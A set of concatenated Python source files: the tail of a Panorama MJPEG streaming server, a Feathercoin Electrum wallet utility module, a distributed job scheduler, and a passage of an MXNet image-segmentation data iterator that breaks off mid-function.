self.wfile.write('<html><head></head><body>'.encode("utf-8"))
self.wfile.write('<h1>Frames not received</h1>'.encode("utf-8"))
self.wfile.write('</body></html>'.encode("utf-8"))
class PanoramaMJPEGServer():
"""
Panorama MJPEG server interface. Create instance in init()
"""
def __init__(self, host='0.0.0.0', port=9000):
"""
Initialize HTTP server on port 9000. Note that you have to use the following command
over SSH to serve up the frames
iptables -I INPUT -p tcp --dport 9000 -j ACCEPT
"""
self.host = host
self.port = port
# Start the http server in a thread
self.server = HTTPServer((self.host, self.port),
PanoramaMJPEGServerHandler)
self.server.allow_reuse_address = True
self.http_thread = Thread(target=self.http_server_thread_function)
self.http_thread.setDaemon(True)
self.http_thread.start()
def http_server_thread_function(self):
"""
Run the http server in this thread
"""
global frames_received
self.server_started = True
try:
logging.info(
'Server initialized at http://{}:{}{}'.format(self.host, self.port, mjpeg_path))
self.server.serve_forever()
except Exception as ex:
logging.error("Error in httpserver: %s", str(ex))
self.server_started = False
finally:
self.server.server_close()
def feed_frame(self, display_array):
""" Feed frame into the mjpeg server class """
global display_buffer, frames_received
try:
# Don't serve until the first frame is received from panorama
frames_received = True
logging.debug("Acquiring lock for jpg")
mjpeg_lock.acquire()
logging.debug("Lock acquired")
ret, jpegfile = cv2.imencode('.jpg', display_array)
logging.debug("Return value when feeding frame: %s", ret)
display_buffer = jpegfile.tostring()
except Exception as ex:
logging.error("Error in mjpeg feed frame: %s", str(ex))
finally:
mjpeg_lock.release()
logging.debug("Lock released")
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from pathlib import Path
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'FTC':8, 'mFTC':5, 'uFTC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['FTC', 'mFTC', 'uFTC', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
xdg_default = os.path.join(os.environ["HOME"], ".local", "share")
return os.path.join(os.getenv("XDG_DATA_HOME", xdg_default), "electrum-ftc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-ftc")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-ftc")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'explorer.feathercoin.com': ('http://explorer.feathercoin.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'chainz.cryptoid.info': ('https://chainz.cryptoid.info/ftc/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
}
testnet_block_explorers = {
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'explorer.feathercoin.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a feathercoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'feathercoin':
raise Exception("Not a feathercoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid feathercoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='feathercoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
Path(path).mkdir(parents=True)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
scheduler.py
|
import Queue
import math
import traceback
from threading import Thread
import monotonic
from distributed import as_completed
from .util import TimeoutManager, haydi_logger
class Job(object):
def __init__(self, worker_id, start_index, size):
"""
:type worker_id: str
:type start_index: int
:type size: int
"""
self.worker_id = worker_id
self.start_index = start_index
self.size = size
self.result = None
self.start_time = monotonic.monotonic()
self.end_time = None
def finish(self, result):
self.result = result
self.end_time = monotonic.monotonic()
def get_duration(self):
return self.end_time - self.start_time
def __str__(self):
return "Job(worker={}, from={}, to={}".format(
self.worker_id,
self.start_index,
self.start_index + self.size)
class JobScheduler(object):
"""
Creates computational graphs for distributed and iterates through them.
Can be limited by domain size or timeout.
"""
def __init__(self,
executor,
worker_count,
strategy,
timeout,
tracer):
"""
:param executor: distributed executor
:param worker_count: number of workers in the cluster
:type strategy: haydi.base.runtime.strategy.WorkerStrategy
:type timeout: datetime.timedelta
:param timeout: timeout for the computation
:type tracer: haydi.base.runtime.trace.Tracer
"""
self.executor = executor
self.worker_count = worker_count
self.size = strategy.size
self.strategy = strategy
self.tracer = tracer
self.index_scheduled = 0
self.index_completed = 0
self.job_size = None
self.timeout_mgr = TimeoutManager(timeout) if timeout else None
self.ordered_futures = []
self.backlog_per_worker = 4
self.target_time = 60 * 3
self.target_time_active = self.target_time
self.completed_jobs = []
self.job_queue = Queue.Queue()
self.job_thread = None
self.completed = False
self.canceled = False
self.cached_args = None
def start(self):
self.cached_args = self.strategy.create_cached_args()
self.executor.scatter([self.cached_args], broadcast=True)
self.job_thread = Thread(target=self._iterate_jobs)
self.job_thread.daemon = True
self.job_thread.start()
def stop(self):
self.canceled = True
size = len(self.ordered_futures)
for i in xrange(size):
self.ordered_futures[i].cancel()
def _iterate_jobs(self):
"""
Iterate through all jobs until the domain size is depleted or
time runs out.
:return: completed job
"""
backlog_half = self.backlog_per_worker / 2
active_futures = self._init_futures(self.backlog_per_worker)
next_futures = []
try:
while ((self._has_more_work() or
self.index_completed < self.index_scheduled) and
not self.canceled):
iterated = 0
for future in as_completed(active_futures):
job = future.result()
self._mark_job_completed(job)
iterated += 1
self.tracer.trace_job(job)
if iterated >= (backlog_half * self.worker_count):
iterated = 0
if self._has_more_work():
next_futures += self._schedule(backlog_half)
if self._has_more_work():
next_futures += self._schedule(backlog_half)
active_futures = next_futures
next_futures = []
except Exception as e:
haydi_logger.error(traceback.format_exc(e))
self.completed = True
def _schedule(self, count_per_worker):
"""
Adjust batch size according to the average duration of recent jobs
and create new futures.
:param count_per_worker: how many jobs should be spawned per worker
:rtype: list of distributed.client.Future
:return: newly scheduled futures
"""
duration = self._get_avg_duration()
delta = duration / float(self.target_time_active)
delta = self._clamp(delta, 0.5, 1.25)
previous_size = self.job_size
self.job_size = int(self.job_size / delta)
self.tracer.trace_job_size(self.job_size)
haydi_logger.info("Scheduling: avg duration {}, size {} -> {}"
.format(duration, previous_size, self.job_size))
return self._create_futures(self._create_distribution(
self.worker_count * count_per_worker, self.job_size))
def _clamp(self, value, minimum, maximum):
return min(maximum, max(minimum, value))
def _get_avg_duration(self):
job_histogram = self.completed_jobs[-self.worker_count:]
total_duration = sum([j.get_duration() for j in job_histogram])
return total_duration / float(len(job_histogram))
def _init_futures(self, count_per_worker):
job_count = self.worker_count * count_per_worker
self.job_size = 200
if self.size:
total_size = int(math.ceil(self.size / float(job_count)))
if total_size < self.job_size:
self.job_size = total_size
return self._create_futures(self._create_distribution(
self.worker_count * count_per_worker, self.job_size))
def _create_distribution(self, job_count, job_size):
return [job_size] * job_count
def _truncate(self, job_distribution):
"""
:type job_distribution: list of int
:return:
"""
if self.size:
remaining = self._get_remaining_work()
expected = sum(job_distribution)
if expected > remaining:
per_job = remaining / len(job_distribution)
job_distribution = self._create_distribution(
len(job_distribution), per_job)
leftover = remaining - (per_job * len(job_distribution))
job_distribution[0] += leftover
assert sum(job_distribution) == remaining
return job_distribution
def _create_futures(self, job_distribution):
"""
:type job_distribution: list of int
:return:
"""
job_distribution = self._truncate(job_distribution)
batches = []
for job_size in job_distribution:
if job_size > 0:
start = self.index_scheduled
batches.append(self.strategy.get_args_for_batch(
self.cached_args, start, job_size))
self.index_scheduled = start + job_size
if len(batches) > 0:
self.tracer.trace_index_scheduled(self.index_scheduled)
self.tracer.trace_comment("Sending {} jobs with size {}"
.format(len(batches), self.job_size))
args = self.strategy.create_job(batches)
futures = self.executor.map(args[0], args[1])
self.ordered_futures += futures
return futures
else:
return []
def _mark_job_completed(self, job):
self.completed_jobs.append(job)
self.index_completed += job.size
self.tracer.trace_index_completed(self.index_completed)
self.job_queue.put(job)
def _get_remaining_work(self):
if self.size:
return self.size - self.index_scheduled
else:
return -1
def _has_more_work(self):
return (not self.size or self.index_scheduled < self.size)\
and not self.strategy.exhausted
|
my_prefetchingIter.py
|
# -*- coding: utf-8 -*-
# 该版本的输入尺寸为50x50
mxnet_095 = '/home/forrest/MXNet/mxnet-0.9.5/python'
import sys
sys.path.append(mxnet_095)
import mxnet
import cPickle
import numpy
import random
import threading
import cv2
import time
import logging
import data_augmentation_util
class MyDataBatch():
def __init__(self):
self.data = []
self.label = []
def append_data(self, new_data):
self.data.append(new_data)
def append_label(self, new_label):
self.label.append(new_label)
def as_ndarray(self, ctx):
for i in range(len(self.data)):
self.data[i] = mxnet.ndarray.array(self.data[i], ctx=ctx)
for i in range(len(self.label)):
self.label[i] = mxnet.ndarray.array(self.label[i], ctx=ctx)
@property
def data(self):
return self.data
@property
def label(self):
return self.label
def test_MyDataBatch():
temp_databatch = MyDataBatch()
temp_databatch.append_data(123)
temp_databatch.append_label(123)
print temp_databatch.data, temp_databatch.label
class ImageSegPrefetchingIter(mxnet.io.DataIter):
def __init__(self, dataPicklePath, \
nThread, \
batch_size, \
enable_horizon_flip=False, \
neg_ratio_list=None # [(iter, ratio),()]
):
# read data from pickle files --------------
try:
logging.info('Start to load data pickle files, it may cost several minutes----------.\n')
self.compressedData = cPickle.load(open(dataPicklePath, 'rb'))
logging.info('Pickle files are loaded.\n')
except:
logging.error('Error ocurrs when loading pickl files!!!')
quit()
self.num_sample = len(self.compressedData)
logging.info('There are %d samples.\n', self.num_sample)
self.nThread = nThread
self.batch_size = batch_size
self.enable_horizon_flip = enable_horizon_flip
self.B_mean = 104.008
self.G_mean = 116.669
self.R_mean = 122.675
self.input_height = 100
self.input_width = 100
self.neg_ratio = 1
neg_ratio_list.reverse()
self.neg_ratio_list = neg_ratio_list
# prepare threads
self.data_taken = [threading.Event() for i in range(self.nThread)]
for e in self.data_taken:
e.set()
self.data_ready = [threading.Event() for i in range(self.nThread)]
for e in self.data_ready:
e.clear()
self.data_queue = [None for i in range(self.nThread)]
self.current_batch = None
self.started = True
# the main procedure running in a thread
def prefetch_func(self, i):
while True:
timeoutFlag = self.data_taken[i].wait() # here, the arg timeout is to detect the exit or thread reduntant
if not self.started or not timeoutFlag:
break
try:
self.data_queue[i] = self._prepare_batch(i)
except Exception, e:
logging.error('Prepare batch wrong in thread %d !! -------------> \n %s', i, e.message)
self.data_queue[i] = None
continue
self.data_taken[i].clear()
self.data_ready[i].set()
self.prefetch_threads = [threading.Thread(target=prefetch_func, args=[self, i]) for i in range(self.nThread)]
for thread in self.prefetch_threads:
thread.setDaemon(True) # make it clear ~~~~~~~~~~~~~~~~~~
thread.start()
def iter_next(self, num_iter):
#set neg ratio
for item in self.neg_ratio_list:
if num_iter >= item[0]:
self.neg_ratio = item[1]
break
# keep looping until getting the databatch
while True:
for i, dataBatch in enumerate(self.data_queue):
if not self.started:
quit()
if dataBatch is None:
continue
self.data_ready[i].wait()
self.current_batch = dataBatch
self.data_queue[i] = None
self.data_ready[i].clear()
self.data_taken[i].set()
return True
time.sleep(0.001) # key part!!!!!!!!!!!!
def __del__(self):
# relase all threads
self.started = False
for e in self.data_taken:
e.set()
for thread in self.prefetch_threads:
thread.join(1)
# this fun is to prepare data batch including data augmentation, and return a DataBatch
def _prepare_batch(self, i):
im_batch = numpy.zeros((self.batch_size, 3, self.input_height, self.input_width), dtype=numpy.float32)
gt_batch = numpy.zeros((self.batch_size, 1, self.input_height, self.input_width), dtype=numpy.float32)
data_batch = MyDataBatch()
for loop in xrange(self.batch_size):
rand_idx = random.randint(0, self.num_sample-1)
# get image and gt
img = cv2.imdecode(self.compressedData[rand_idx]['image'].copy(), cv2.CV_LOAD_IMAGE_COLOR)
gt = cv2.imdecode(self.compressedData[rand_idx]['gt'].copy(), cv2.CV_LOAD_IMAGE_GRAYSCALE)
border = self.compressedData[rand_idx]['border'].copy() # numpy.array([top, bottom, left, right])
img_height, img_width = img.shape[:2]
gt_center_y = round((border[0]+border[1])/2.0)
gt_center_x = round((border[2]+border[3])/2.0)
change_ratio = 0.3
height_change = int( (round(self.input_height/2.0)-round((border[1]-border[0])/2.0))*change_ratio )
width_change = int( (round(self.input_width/2.0)-round((border[3]-border[2])/2.0))*change_ratio )
crop_top_change = random.randint(-height_change, height_change)
crop_left_change = random.randint(-width_change, width_change)
crop_top = gt_center_y-round(self.input_height/2.0)+crop_top_change
crop_left = gt_center_x-round(self.input_width/2.0)+crop_left_change
if crop_top < 0:
to_top = -crop_top
from_top = 0
else:
to_top = 0
from_top = crop_top
if crop_top+self.input_height > img_height:
to_bottom = img_height-crop_top
from_bottom = img_height
else:
to_bottom = self.input_height
from_bottom = crop_top+self.input_height
if crop_left < 0:
to_left = -crop_left
from_left = 0
else:
to_left = 0
from_left = crop_left
if crop_left+self.input_width > img_width:
to_right = img_width-crop_left
from_right = img_width
